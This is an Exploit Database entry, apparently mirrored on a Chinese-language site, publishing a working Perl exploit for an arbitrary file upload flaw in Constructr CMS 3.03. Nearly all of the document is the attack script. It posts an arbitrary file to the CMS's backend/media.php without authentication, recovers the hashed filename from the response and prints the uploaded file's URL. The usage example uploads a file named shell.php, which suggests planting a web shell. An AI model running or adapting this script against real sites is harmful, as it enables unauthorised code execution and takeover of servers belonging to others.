Constructr CMS 3.03 – Arbitrary File Upload

• Exploit Database
• 16 阅读

• 作者： plucky
  日期： 2011-03-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17035/

• #!/usr/bin/env perl
  
  # Constructr CMS 3.03 Arbitrary File Upload
  #
  # Author: plucky
  # Email:io.plucky@gmail.com 
  #
  # Vulnerable Page: /constructr/backend/media.php [line 
  # App Download:http://sourceforge.net/projects/constructr/
  #
  # Date: 23/03/2011
  # THX TO: yawn, shrod, h473 and DoMinO
  
  use strict;
  use warnings;
  
  use LWP::UserAgent;
  use HTTP::Request::Common qw( POST );
  
  
  my $host = '';
  my $file_to_upload = '';
  my $new_file_name= '';
  my $file_extension = '';
  
  
  sub exploit_usage {
  
  print 'Constructr CMS 3.03 Arbitrary File Upload'. "\n".
  '-------------------------'. "\n".
  'Author: plucky' . "\n".
  'Email:io.plucky@gmail.com'. "\n".
  '-------------------------'. "\n". 
  'Usage:' . "\n".
  'perl xpl.pl [host]/[cms-path]/ /[path-file]/[file]' . "\n".
  'Example:' . "\n".
  'perl ' . $0 . ' http://vulnerable.com/constructr/ /home/plucky/shell.php' . "\n";
  
  exit;
  
  }
  
  sub file_parse {
  
  my $file_name = '';
  my $file_extension= '';
  my $file_to_upload= '';
  my $rfile_to_upload = '';
  
  
  $rfile_to_upload = shift;
  $file_to_upload= ${$rfile_to_upload};
  
  $file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i;
  
  $file_name= $1;
  $file_extension = $2;
  
  return ( $file_name, $file_extension )
  
  }
  
  sub upload_file {
  
  my $host= '';
  my $rhost = '';
  my $file_name = '';
  my $file_extension= '';
  my $response= '';
  my $path= '';
  my $html= '';
  my $user_agent= '';
  my $file_to_upload= '';
  my $rfile_to_upload = '';
  my $new_file_name = '';
  
  
  ( $rhost, $rfile_to_upload ) = @_;
  
  $host = ${$rhost};
  $file_to_upload = ${$rfile_to_upload};
  
  $user_agent = LWP::UserAgent->new;
  $path = $host . 'backend/media.php';
  
  
  $response = $user_agent->post(
  $path,
  [
  'create_file' => 'try',
  'file'=> [$file_to_upload],
  ],
  'Content_Type' => 'form-data'
  );
  
  
  ( $file_name, $file_extension ) = file_parse( \$file_to_upload );
  
  
  $html = $response->decoded_content;
  $html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i;
  
  $new_file_name = $1;
  
  return ( $new_file_name, $file_extension );
  
  }
  
  @ARGV == 2
   ? ( $host, $file_to_upload ) = @ARGV
   : exploit_usage();
  
  ( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload );
  
  
  print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n";